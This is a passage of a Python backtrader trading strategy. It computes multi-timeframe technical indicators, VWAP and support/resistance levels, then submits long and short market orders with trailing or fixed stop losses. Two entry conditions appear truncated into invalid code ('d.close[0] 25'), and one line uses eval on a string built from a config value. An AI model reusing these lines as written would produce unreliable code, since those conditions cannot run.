= btind.BollingerBands(d,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tperiod=indp.get('bollinger_period'),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tdevfactor = indp.get('bollinger_dist'),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tplot=False)\n\t\t\n\t\t\t#Stochastics\n\t\t\tself.inds[d._name]['stochastic'] = btind.StochasticFast(d,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tperiod=indp.get('stoch_per'),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tperiod_dfast= indp.get('stoch_fast'),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tsafediv=True,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tplot=True)\n\t\t\t\n\t\t\t#ADX\n\t\t\tself.inds[d._name]['adx'] = btind.ADX(d,plot=True)\n\t\t\t\t\t\n\t\t\t\"\"\"\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t#Pivots\n\t\t\tself.inds[d._name]['pivots'] = btind.pivotpoint.PivotPoint(d,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tplot=False)\n\t\t\t\"\"\"\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\n\t\t\t#Highest and Lowest Values of Period Indicator\n\t\t\tself.inds[d._name]['highest'] = btind.Highest(d.high,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tperiod=indp.get('breakout_per'),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tplot=False)\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\tself.inds[d._name]['lowest'] = btind.Lowest(d.low,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tperiod=indp.get('breakout_per'),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tplot=False)\n\t\t\t\n\t\t\t#Slope indicators\n\t\t\tself.inds[d._name]['slope']= btind.Slope(d.close,\n\t\t\t\t\t\t\t\t\t\t\t\t\tperiod=indp.get('slope_period'),\n\t\t\t\t\t\t\t\t\t\t\t\t\tplot=False)\n\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\tself.inds[d._name]['slope_sma1'] = \tbtind.Slope(self.inds[d._name]['sma1'],\n\t\t\t\t\t\t\t\t\t\t\t\t\tperiod=indp.get('slope_period'),\n\t\t\t\t\t\t\t\t\t\t\t\t\tplot=False,\n\t\t\t\t\t\t\t\t\t\t\t\t\tplotname = 'Slope_SMA1')\n\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\tself.inds[d._name]['slope_of_slope_sma1'] = \tbtind.Slope(self.inds[d._name]['slope_sma1'],\n\t\t\t\t\t\t\t\t\t\t\t\t\tperiod=indp.get('slope_period'),\n\t\t\t\t\t\t\t\t\t\t\t\t\tplot=False,\n\t\t\t\t\t\t\t\t\t\t\t\t\tplotname = 'Slope_of_Slope_SMA1')\n\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\tself.inds[d._name]['slope_sma_width'] = btind.Slope(self.inds[d._name]['sma1']-self.inds[d._name]['sma2'],\n\t\t\t\t\t\t\t\t\t\t\t\t\tperiod=indp.get('slope_period'),\n\t\t\t\t\t\t\t\t\t\t\t\t\tplot=False,\n\t\t\t\t\t\t\t\t\t\t\t\t\tplotname = 'Slope_SMA_WIDTH')\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\tself.inds[d._name]['slope_adx'] = \tbtind.Slope(self.inds[d._name]['adx'],\n\t\t\t\t\t\t\t\t\t\t\t\t\tperiod=indp.get('slope_period'),\n\t\t\t\t\t\t\t\t\t\t\t\t\tplot=False,\n\t\t\t\t\t\t\t\t\t\t\t\t\tplotname = 'Slope_ADX')\t\n\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\tself.inds[d._name]['slope_of_slope_adx'] = \tbtind.Slope(self.inds[d._name]['slope_adx'],\n\t\t\t\t\t\t\t\t\t\t\t\t\tperiod=indp.get('slope_period'),\n\t\t\t\t\t\t\t\t\t\t\t\t\tplot=False,\n\t\t\t\t\t\t\t\t\t\t\t\t\tplotname = 'Slope_of_Slope_ADX')\t\n\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\tself.inds[d._name]['slope_rsi'] = \tbtind.Slope(self.inds[d._name]['rsi'],\n\t\t\t\t\t\t\t\t\t\t\t\t\tperiod=indp.get('slope_period'),\n\t\t\t\t\t\t\t\t\t\t\t\t\tplot=False,\n\t\t\t\t\t\t\t\t\t\t\t\t\tplotname = 'Slope_RSI')\n\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\tself.inds[d._name]['slope_of_slope_rsi'] = \tbtind.Slope(self.inds[d._name]['slope_rsi'],\n\t\t\t\t\t\t\t\t\t\t\t\t\tperiod=indp.get('slope_period'),\n\t\t\t\t\t\t\t\t\t\t\t\t\tplot=False,\n\t\t\t\t\t\t\t\t\t\t\t\t\tplotname = 'Slope_of_Slope_RSI')\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\tself.inds[d._name]['slope_ema1'] = \tbtind.Slope(self.inds[d._name]['ema1'],\n\t\t\t\t\t\t\t\t\t\t\t\t\tperiod=indp.get('slope_period'),\n\t\t\t\t\t\t\t\t\t\t\t\t\tplot=False,\n\t\t\t\t\t\t\t\t\t\t\t\t\tplotname = 'Slope_EMA1')\n\t\t\tself.inds[d._name]['slope_ema2'] = \tbtind.Slope(self.inds[d._name]['ema2'],\n\t\t\t\t\t\t\t\t\t\t\t\t\tperiod=indp.get('slope_period'),\n\t\t\t\t\t\t\t\t\t\t\t\t\tplot=False,\n\t\t\t\t\t\t\t\t\t\t\t\t\tplotname = 'Slope_EMA2')\n\t\t\tself.inds[d._name]['slope_ema3'] = \tbtind.Slope(self.inds[d._name]['ema3'],\n\t\t\t\t\t\t\t\t\t\t\t\t\tperiod=indp.get('slope_period'),\n\t\t\t\t\t\t\t\t\t\t\t\t\tplot=False,\n\t\t\t\t\t\t\t\t\t\t\t\t\tplotname = 'Slope_EMA3')\n\t\t\t\n\t\t\tself.inds[d._name]['avg_volume'] = btind.Average(d.volume,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tperiod=indp.get('avg_per'),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tplot=False)\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t#Plot ADX and Slope on same subplot as stochastic\t\t\t\t\t\t\t\n\t\t\tself.inds[d._name]['adx'].plotinfo.plotmaster = self.inds[d._name]['rsi']\n\t\t\t\n\t\t\t\n\t\t\t\t\t\t\t\n\tdef prenext(self):\n\t\t#print(self.datas[0].datetime.datetime().strftime('%H:%M:%S'))\n\t\t#pre-loads all indicator data for all timeframes before strategy starts executing\n\t\tself.counter += 1\n\t\t#If you want to see full set of data\n\t\t\"\"\"\n\t\tfor i, d in enumerate(self.datas):\n\t\t\tif d._name == d._name[:-1]+'0':\n\t\t\t\tprint('date {} prenext len {} - counter {}'.format(d.datetime.datetime().strftime('%Y-%m-%d %H:%M:%S'),len(self), self.counter))\n\t\t\"\"\"\n\t\tself.next()\n\t\t\t\t\n\tdef nextstart(self):\n\t\t#There is a nextstart method which is called exactly once, to mark the switch from prenext to next. \n\t\tself.prenext_done = True\n\t\tprint('--------------------------------------------------')\n\t\tprint('nextstart called with len {}'.format(len(self)))\n\t\tprint('--------------------------------------------------')\n\t\t\n\t\tsuper(Strategy, self).nextstart()\n\t\t\n\tdef next(self):\n\n\t\t#Start Timer\n\t\tif UserInputs.model_params().get('timer')=='on':\n\t\t\tself.t0 = datetime.utcnow() \n\t\t\n\t\t#print('Strategy: {}'.format(len(self)))\n\t\t\n\t\t#Create/Instantiate objects to access user input parameters\n\t\tmodelp = UserInputs.model_params()\n\t\tindp = UserInputs.ind_params()\n\t\tdatalist = UserInputs.datalist('hist')\n\t\tibdatalist = UserInputs.datalist('ib')\n\t\t\n\t\t#Convert backtrader float date to datetime so i can see time on printout and manipulate time variables\n\t\tdt = self.datetime.date()\n\t\tself.datadate=datetime.strftime(self.data.num2date(),'%H:%M:%S')\n\t\tself.hourmin = datetime.strftime(self.data.num2date(),'%H:%M')\n\t\t\n\t\tself.nextcounter = self.nextcounter + 1\n\t\t\n\t\t#Counter for VWAP Calculation (# of cumulative periods within 1 day)\n\t\tfor x in range(0, len(self.datas), len(self.datas)):\n\t\t\tif self.hourmin == '08:30':\n\t\t\t\t\tself.dayperiod = 0\t\n\t\t\tself.dayperiod = self.dayperiod + 1\n\t\t\t\n\t\t#Get available cash\n\t\tcash_avail = self.broker.getcash()\n\t\t\n#-------------------------------------------------------------------------------------------------------------------------\t\n\t\t#SETUP TRADING ENTRY/EXIT TIMEFRAME \n\t\tif self.maxtimeframe() > self.max_ind_period():\n\t\t\tfor i, d in enumerate(self.datas): #Need to iterate over all datas so atr and sizing can be adjusted for multiple time frame user parameters\n\t\t\t\t\n\t\t\t\t#Create naming convention so other timeframe data can be accessed via dictionary (i.e. support/resistance data)\t\n\t\t\t\t#If other timeframes needed, just change data name within calculation to one of the names below\n\t\t\t\tself.name_t0 = d._name[:-1]+'0'\n\t\t\t\tself.name_t1 = d._name[:-1]+'1'\n\t\t\t\tself.name_t2 = d._name[:-1]+'2'\n\t\t\t\t\t\t\n\t\t\t\t#Set support and resistance levels\n\t\t\t\tif self.resistance(d.high.get(ago=0,size=indp.get('lookback')),d.low.get(ago=0,size=indp.get('lookback')),modelp.get('min_touches'),modelp.get('tolerance_perc'),modelp.get('bounce_perc')) != 1000:\n\t\t\t\t\tself.res_dict[d._name]= self.resistance(d.high.get(ago=0,size=indp.get('lookback')),d.low.get(ago=0,size=indp.get('lookback')),modelp.get('min_touches'),modelp.get('tolerance_perc'),modelp.get('bounce_perc'))\n\t\t\t\tif self.support(d.high.get(ago=0,size=indp.get('lookback')),d.low.get(ago=0,size=indp.get('lookback')),modelp.get('min_touches'),modelp.get('tolerance_perc'),modelp.get('bounce_perc')) !=0:\n\t\t\t\t\tself.sup_dict[d._name]=self.support(d.high.get(ago=0,size=indp.get('lookback')),d.low.get(ago=0,size=indp.get('lookback')),modelp.get('min_touches'),modelp.get('tolerance_perc'),modelp.get('bounce_perc'))\n\t\t\t\t\t\t\n\t\t\t\tself.sup_t1 = self.sup_dict.get(self.name_t1) \n\t\t\t\tself.res_t1 = self.res_dict.get(self.name_t1) \n\t\t\t\tself.sup_t2 = self.sup_dict.get(self.name_t2) \n\t\t\t\tself.res_t2 = self.res_dict.get(self.name_t2) \n\t\t\t\t\n\t\t\t\t#Calculate VWAP\t- can't use indicator because only works for fixed period (intraday period expands throughout day)\n\t\t\t\tif d._name==self.name_t0: #only calculate VWAP for base timeframe\t\t\n\t\t\t\t\t\n\t\t\t\t\t#Determine cumulative volume and typical price, add typprice values to default dictionary, then sum values for the day\n\t\t\t\t\tself.cumvol = sum(d.volume.get(ago=0,size=self.dayperiod)) #sum all values for period defined in size\n\t\t\t\t\tself.typprice = round(((d.close[0]+d.high[0]+d.low[0])/3)*d.volume[0],2)\n\t\t\t\t\tself.typprice_dict[d._name].append(self.typprice)\n\t\t\t\t\tself.cumtypprice = sum(self.typprice_dict.get(self.name_t0)[-self.dayperiod:])\n\t\t\t\t\tif self.cumvol==0: #handle divide by zero error\n\t\t\t\t\t\treturn 0\n\t\t\t\t\telse:\n\t\t\t\t\t\tself.vwap = round(self.cumtypprice/self.cumvol,2)\n\t\t\t\t#print(d._name,self.hourmin,d.close[0],d.high[0],d.low[0],d.volume[0],self.typprice,self.cumtypprice,self.cumvol,self.vwap)\n\n\t\t\t\t#Calculate Moving Averages\n\t\t\t\tself.sma1_t0 = round(self.inds.get(self.name_t0).get('sma1')[0],3)\n\t\t\t\tself.sma1_t1 = round(self.inds.get(self.name_t1).get('sma1')[0],3)\n\t\t\t\tself.sma2_t1 = round(self.inds.get(self.name_t2).get('sma2')[0],3)\n\t\t\t\t#self.vixsma_t0 = round(self.inds.get('VIX0').get('sma1')[0],3) #holds just VIX0 sma data\n\t\t\t\tself.spysma_t0 = round(self.inds.get('SPY0').get('sma1')[0],3) #holds just SPY0 sma data\n\t\t\t\t#self.ticksma_t0 = round(self.inds.get('TICK-NYSE0').get('sma1')[0],3) #holds just TICK0 sma data\n\t\t\t\t#self.trinsma_t0 = round(self.inds.get('TRIN-NYSE0').get('sma1')[0],3) #holds just TRIN0 sma data\n\t\t\t\t\t\t\t\t\t\n\t\t\t\tself.ema1_t1 = round(self.inds.get(self.name_t1).get('ema1')[0],3)\n\n\t\t\t\t#Determine if space between SMA1 and SMA2 is widening or contracting \n\t\t\t\tself.slope_sma_width_t1 = round(self.inds.get(self.name_t1).get('slope_sma_width')[0],3)\n\t\t\t\t\t\n\t\t\t\t#Calculate slopes\n\t\t\t\tself.slope_t0 = round(self.inds.get(self.name_t0).get('slope')[0],3)\n\t\t\t\tself.slope_t1 = round(self.inds.get(self.name_t1).get('slope')[0],3)\n\t\t\t\tself.slope_t2 = round(self.inds.get(self.name_t2).get('slope')[0],3)\n\t\t\t\t\n\t\t\t\tself.slope_sma1_t1 = round(self.inds.get(self.name_t1).get('slope_sma1')[0],3)\n\t\t\t\tself.slope_of_slope_sma1_t1 = round(self.inds.get(self.name_t1).get('slope_of_slope_sma1')[0],3)\n\t\t\t\t\n\t\t\t\tself.slope_adx_t1 = round(self.inds.get(self.name_t1).get('slope_adx')[0],3)\n\t\t\t\tself.slope_of_slope_adx_t1 = round(self.inds.get(self.name_t1).get('slope_of_slope_adx')[0],3)\n\t\t\t\t\n\t\t\t\tself.slope_rsi_t1 = round(self.inds.get(self.name_t1).get('slope_rsi')[0],3)\n\t\t\t\tself.slope_of_slope_rsi_t1 = round(self.inds.get(self.name_t1).get('slope_of_slope_rsi')[0],3)\n\t\t\t\n\t\t\t\t#Calculate RSI\n\t\t\t\tself.rsi_t1 = round(self.inds.get(self.name_t1).get('rsi')[0],2)\n\t\t\t\t\n\t\t\t\t#Calculate Bollinger Bands\n\t\t\t\tself.boll_top_t1 = self.inds.get(self.name_t1).get('bollinger').lines.top[0]\n\t\t\t\tself.boll_bot_t1 = self.inds.get(self.name_t1).get('bollinger').lines.bot[0]\n\t\t\t\tself.boll_mid_t1 = self.inds.get(self.name_t1).get('bollinger').lines.mid[0]\n\t\t\t\t\n\t\t\t\t#Calculate Stochastic lines\n\t\t\t\tself.percK_t0 = round(self.inds.get(self.name_t0).get('stochastic').lines.percK[0],3)\n\t\t\t\tself.percK_t1 = round(self.inds.get(self.name_t1).get('stochastic').lines.percK[0],3)\n\t\t\t\tself.percD_t1 = round(self.inds.get(self.name_t1).get('stochastic').lines.percD[0],3)\n\t\t\t\t\n\t\t\t\t#Calculate ADX - Average Directional Movement Index to measure trend strength\n\t\t\t\tself.adx_t1 = round(self.inds.get(self.name_t1).get('adx')[0],3)\n\t\t\t\tself.adx_t2 = round(self.inds.get(self.name_t2).get('adx')[0],3)\n\t\t\t\t\n\t\t\t\t#Calculate highest and lowest indicators\n\t\t\t\tself.highest_t1 = round(self.inds.get(self.name_t1).get('highest')[0],3) \n\t\t\t\tself.lowest_t1 = round(self.inds.get(self.name_t1).get('lowest')[0],3) \n\t\t\t\t\n\t\t\t\tif d._name == d._name[:-1]+'0': #For a single timeframe only (timeframe 1)\n\t\t\t\t\tself.bullish_three_line_strike_pattern_t0= self.bullish_three_line_strike(d)\n\t\t\t\t\tself.bearish_three_line_strike_pattern_t0= self.bearish_three_line_strike(d)\n\t\t\t\t\tself.bullish_engulfing_pattern_t0= self.bullish_engulfing(d,self.slope_t0)\n\t\t\t\t\tself.bearish_engulfing_pattern_t0= self.bearish_engulfing(d,self.slope_t0)\n\t\t\t\t\t\n\t\t\t\tif d._name == d._name[:-1]+'1': #For a single timeframe only (timeframe 1)\n\t\t\t\t\t#Determine if candlestick patterns exist\n\t\t\t\t\tself.bullish_engulfing_pattern_t1= self.bullish_engulfing(d,self.slope_t1)\n\t\t\t\t\tself.bearish_engulfing_pattern_t1= self.bearish_engulfing(d,self.slope_t1)\t\n\t\t\t\t\tself.bullish_three_line_strike_pattern_t1= self.bullish_three_line_strike(d)\n\t\t\t\t\tself.bearish_three_line_strike_pattern_t1= self.bearish_three_line_strike(d)\n\t\t\t\t\t\n\t\t\t\tif d._name == d._name[:-1]+'2':\t#For a single timeframe only (timeframe 2)\n\t\t\t\t\tself.bullish_engulfing_pattern_t2= self.bullish_engulfing(d,self.slope_t2)\n\t\t\t\t\tself.bearish_engulfing_pattern_t2= self.bearish_engulfing(d,self.slope_t2)\t\n\t\t\t\t\tself.bullish_three_line_strike_pattern_t2= self.bullish_three_line_strike(d)\n\t\t\t\t\tself.bearish_three_line_strike_pattern_t2= self.bearish_three_line_strike(d)\n\t\t\t\t\n\t\t\t\t#Calc Average ATR\n\t\t\t\tself.atr_t1 = round(self.inds.get(self.name_t1).get('atr')[0],3)\n\t\t\t\tavg_atr_t1 = self.average_atr(self.name_t1)\n\t\t\t\t\n\t\t\t\t#Calculate ATR (to be subtracted from price for stop loss calculations. Determine atr timeframe based on user defined parameter. EVAL turns a string into a variable that can return a value\n\t\t\t\tself.atr_mod= eval('self.atr_t{}'.format(modelp.get('atr_tframe')))\n\t\t\t\tself.atr_dist = self.atr_mod * indp.get('atrdist')\n\t\t\t\t\n\t\t\t\t#Determine open gap\n\t\t\t\tself.gap = self.open_gap(self.name_t0,d)\t\n\t\t\t\t\t\n\t\t\t\t#Determine open 15 minute range\n\t\t\t\tself.range_high = self.open_range('high',self.name_t0)\n\t\t\t\tself.range_low = self.open_range('low',self.name_t0)\n\t\t\t\t\n\t\t\t\t#Calculate sizing and exit prices for base trading timeframe\n\t\t\t\tif d._name == d._name[:-1]+'0':\t#For a single timeframe only (timeframe 0)\n\t\t\t\t\t#Pull target exit prices from dictionary\n\t\t\t\t\tself.short_exit_price = self.target_short_dict[self.name_t0]\n\t\t\t\t\tself.long_exit_price = self.target_long_dict[self.name_t0] \n\t\t\t\t\t#Calculate Size for single timeframe only\n\t\t\t\t\tself.size = self.sizing(d,self.name_t0,modelp.get('total_dollars_risked'),modelp.get('dollars_risked_per_trade'),self.atr_mod)\n\t\t\t\t\n\t\t\t\t#Ensure we have the cash to afford next position\n\t\t\t\tpos_cost = self.size * d.close[0] \n\t\t\t\t\n\t\t\t\t#Get Positions and toggle inorder status to false if stop-loss was executed (when position size becomes '0'). Used default dict to collect multiple values for each key in dictionary\t\n\t\t\t\tself.pos = self.getposition(d).size\n\t\t\t\tself.pos_dict[d._name].append(self.pos) #add position size to dictionary\n\t\t\t\tmycount = sum(map(len,self.pos_dict.values())) #determine count of values in defaultdict\n\t\t\t\tif mycount > (len(UserInputs.datalist('hist'))*3): #dic count is greater than tickers * # of datas\n\t\t\t\t\tif (self.pos_dict[d._name][-2]!=0 and self.pos_dict[d._name][-1]==0 and self.inorder_dict[d._name] == True):\n\t\t\t\t\t\tself.inorder_dict[d._name] = False \n\t\t\t\t\t\n\t\t\t\t#DEFINE OVERALL ENTRY LOGIC FOR LONG AND SHORT\n\t\t\t\tif (\n\t\t\t\t\tcash_avail > pos_cost\n\t\t\t\t\tand self.pos==0\n\t\t\t\t\tand not self.inorder_dict.get(d._name)\n\t\t\t\t\tand self.prenext_done #Start trading after all prenext data loads\n\t\t\t\t\tand (self.hourmin>='08:50'and self.hourmin<='10:00')\n\t\t\t\t\t): \t\n\t\t\t\t\t#DEFINE LONG ENTRY LOGIC\n\t\t\t\t\tif(\t#self.slope_t1 > 0\n\t\t\t\t\t\t#self.bullish_engulfing_pattern_t1\n\t\t\t\t\t\tself.slope_t1 > 0\n\t\t\t\t\t\tand self.slope_t2 > 0\n\t\t\t\t\t\tand d.close[0] 25\n\t\t\t\t\t\t#and d.high[0]>self.range_high\n\t\t\t\t\t\t#and (self.bullish_three_line_strike_pattern_t0 or self.bullish_engulfing_pattern_t0)\n\t\t\t\t\t\t#and self.percK_t0<20\n\t\t\t\t\t\t#and self.percK_t1<30\n\t\t\t\t\t\t#and d.low[0] <= self.sup_t1\n\t\t\t\t\t\t#and self.slope_time2 > 0\n\t\t\t\t\t\t#and d.high[0]>d.high[-1]\n\t\t\t\t\t\t#and d.volume[0] > d.volume[-1] * 3\n\t\t\t\t\t ):\n\t\t\t\t\t\t \t\t \n\t\t\t\t\t\tif d._name == d._name[:-1]+'0':\t#Trade basetimeframe only\n\t\t\t\t\t\t\t#CREATE LONG ENTRY ORDER\n\t\t\t\t\t\t\t#if not (d._name[:-1]=='VIX' or d._name[:-1]=='TICK-NYSE' or d._name[:-1]=='TRIN-NYSE' or d._name[:-1]=='SPY'):\n\t\t\t\t\t\t\tif not modelp.get('live_status'):\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t#Create Long Order\n\t\t\t\t\t\t\t\tlong_name = '{} - Enter Long Trade'.format(d._name)\n\t\t\t\t\t\t\t\tself.long_ord = self.buy(data=d._name,\n\t\t\t\t\t\t\t\t\t\t\t\t\tsize=self.size,\n\t\t\t\t\t\t\t\t\t\t\t\t\texectype=bt.Order.Market,\n\t\t\t\t\t\t\t\t\t\t\t\t\ttransmit=False,\n\t\t\t\t\t\t\t\t\t\t\t\t\tname = long_name)\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t#Create size dictionary so same size can be referenced when you exit trade\n\t\t\t\t\t\t\t\tself.size_dict[d._name] = self.size\n\t\t\t\t\t\t\t\t#Track if currently in an order or not\n\t\t\t\t\t\t\t\tself.inorder_dict[d._name] = True\n\t\t\t\t\t\t\t\t#Set target prices to be referenced when you exit trade\n\t\t\t\t\t\t\t\tself.target_long_price = round((d.open[0]+(modelp.get('dollars_risked_per_trade')*modelp.get('target'))/self.size),3)\n\t\t\t\t\t\t\t\tself.target_long_dict[d._name] = round(self.target_long_price,3)\t\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tif modelp.get('TrailingStop'):\n\t\t\t\t\t\t\t\t\t#Create Trailing Long Stop Loss\n\t\t\t\t\t\t\t\t\tlong_stop_name = '{} - Trailing StopLoss for Long Entry'.format(d._name)\n\t\t\t\t\t\t\t\t\tself.long_stop_ord = self.sell(data=d._name,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tsize=self.size,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\texectype=bt.Order.StopTrail,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tprice=self.stoploss('long',d,self.size,modelp.get('dollars_risked_per_trade')),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\ttrailamount = self.atr_dist,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\ttransmit=True,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tparent=self.long_ord,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tname=long_stop_name)\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\telif not modelp.get('TrailingStop'):\n\t\t\t\t\t\t\t\t\t#Create Fixed Long Stop Loss\n\t\t\t\t\t\t\t\t\tlong_stop_name = '{} - Fixed StopLoss for Long Entry'.format(d._name)\n\t\t\t\t\t\t\t\t\tself.long_stop_ord = self.sell(data=d._name,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tsize=self.size,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\texectype=bt.Order.Stop,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tprice=self.stoploss('long',d,self.size,modelp.get('dollars_risked_per_trade')),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\ttransmit=True,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tparent=self.long_ord,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tname=long_stop_name)\n\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tself.longstop_dict[d._name] = self.long_stop_ord\n\t\n\t\t\t\t\t\telif modelp.get('live_status') and self.data_live:\n\t\t\t\t\t\t\t#Create Long Entry Order\n\t\t\t\t\t\t\tlong_name = '{} - Enter Long Trade'.format(d._name)\n\t\t\t\t\t\t\tself.long_ord = self.buy(data=d._name,\n\t\t\t\t\t\t\t\t\t\t\t\tsize=self.size,\n\t\t\t\t\t\t\t\t\t\t\t\texectype=bt.Order.Market,\n\t\t\t\t\t\t\t\t\t\t\t\ttransmit=False,\n\t\t\t\t\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tself.size_dict[d._name] = self.size\n\t\t\t\t\t\t\tself.target_long_price = round((d.open[0]+(modelp.get('dollars_risked_per_trade')*modelp.get('target'))/self.size),3)\n\t\t\t\t\t\t\tself.target_long_dict[d._name] = round(self.target_long_price,3)\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tif modelp.get('TrailingStop'):\n\t\t\t\t\t\t\t\t#Create Trailing Long Stop Loss\n\t\t\t\t\t\t\t\tlong_stop_name = '{} - Trailing StopLoss for Long Entry'.format(d._name)\n\t\t\t\t\t\t\t\tself.long_stop_ord = self.sell(data=d._name,\n\t\t\t\t\t\t\t\t\t\t\t\t\tsize=self.size,\n\t\t\t\t\t\t\t\t\t\t\t\t\texectype=bt.Order.StopTrail,\n\t\t\t\t\t\t\t\t\t\t\t\t\tprice=self.stoploss('long',d,self.size,modelp.get('dollars_risked_per_trade')),\n\t\t\t\t\t\t\t\t\t\t\t\t\ttrailamount = self.atr_dist,\n\t\t\t\t\t\t\t\t\t\t\t\t\ttransmit=True,\n\t\t\t\t\t\t\t\t\t\t\t\t\tparent=self.long_ord,\n\t\t\t\t\t\t\t\t\t\t\t\t\tname=long_stop_name)\n\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\telif not modelp.get('TrailingStop'):\n\t\t\t\t\t\t\t\t#Create Fixed Long Stop Loss\n\t\t\t\t\t\t\t\tlong_stop_name = '{} - Fixed StopLoss for Long Entry'.format(d._name)\n\t\t\t\t\t\t\t\tself.long_stop_ord = self.sell(data=d._name,\n\t\t\t\t\t\t\t\t\t\t\t\t\tsize=self.size,\n\t\t\t\t\t\t\t\t\t\t\t\t\texectype=bt.Order.Stop,\n\t\t\t\t\t\t\t\t\t\t\t\t\tprice=self.stoploss('long',d,self.size,modelp.get('dollars_risked_per_trade')),\n\t\t\t\t\t\t\t\t\t\t\t\t\ttransmit=True,\n\t\t\t\t\t\t\t\t\t\t\t\t\tparent=self.long_ord,\n\t\t\t\t\t\t\t\t\t\t\t\t\tname=long_stop_name)\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tself.longstop_dict[d._name] = self.long_stop_ord\n\t\t\t\t\t\t\tself.bought = len(self) #stores bar number when trade was entered\n\t\t\n\t\t\t\t\t#DEFINE SHORT ENTRY LOGIC\n\t\t\t\t\telif (\t#d.volume[0] > d.volume[-1]*3\n\t\t\t\t\t\t\t#and d.open[0] 25\n\t\t\t\t\t\t\t#self.slope_t0 < 0\n\t\t\t\t\t\t\tself.slope_t1 < 0\n\t\t\t\t\t\t\tand self.slope_t2 < 0\n\t\t\t\t\t\t\tand d.close[0]>self.res_t1\n\t\t\t\t\t\t\t#and (self.bearish_three_line_strike_pattern_t0 or self.bearish_engulfing_pattern_t0)\n\t\t\t\t\t\t\t#and self.bearish_engulfing_pattern_t1\n\t\t\t\t\t\t\t#and d.low[0]>self.range_low\n\t\t\t\t\t\t\t#and self.percK_t0>80\n\t\t\t\t\t\t\t#and self.percK_t1>70\n\t\t\t\t\t\t\t#and self.slope_time2 < 0\n\t\t\t\t\t\t\t#and d.high[0] >= self.res_t1\n\t\t\t\t\t\t\t#and d.low[0]>d.low[-1]\n\t\t\t\t\t\t\t#and d.volume[0] > d.volume[-1] * 3\n\t\t\t\t\t\t ):\n\t\t\t\t\n\t\t\t\t\t\t\tif d._name == d._name[:-1]+'0': #Trade basetimeframe only\n\t\t\t\t\t\t\t\t#SHORT ENTRY ORDER\n\t\t\t\t\t\t\t\t#if not (d._name[:-1]=='VIX' or d._name[:-1]=='TICK-NYSE' or d._name[:-1]=='TRIN-NYSE' or d._name[:-1]=='SPY'):\n\t\t\t\t\t\t\t\t\tif not modelp.get('live_status'):\n\t\t\t\t\t\t\t\t\t\t#Create Short Entry Order\n\t\t\t\t\t\t\t\t\t\tshort_name = '{} - Enter Short Trade'.format(d._name)\n\t\t\t\t\t\t\t\t\t\tself.short_ord = self.sell(data=d._name,\n\t\t\t\t\t\t\t\t\t\t\t size=self.size,\n\t\t\t\t\t\t\t\t\t\t\t exectype=bt.Order.Market,\n\t\t\t\t\t\t\t\t\t\t\t transmit=False,\n\t\t\t\t\t\t\t\t\t\t\t name=short_name,\n\t\t\t\t\t\t\t\t\t\t\t )\n\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\tself.size_dict[d._name] = self.size\n\t\t\t\t\t\t\t\t\t\tself.inorder_dict[d._name] = True\n\t\t\t\t\t\t\t\t\t\tself.target_short_price = round((d.open[0]-(modelp.get('dollars_risked_per_trade')*modelp.get('target'))/self.size),3)\n\t\t\t\t\t\t\t\t\t\tself.target_short_dict[d._name] = round(self.target_short_price,3)\n\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\tif modelp.get('TrailingStop'):\n\t\t\t\t\t\t\t\t\t\t\t#Create Trailing Short Stop Loss\t \n\t\t\t\t\t\t\t\t\t\t\tshort_stop_name = '{} - Trailing StopLoss for Short Entry'.format(d._name)\n\t\t\t\t\t\t\t\t\t\t\tself.short_stop_ord = 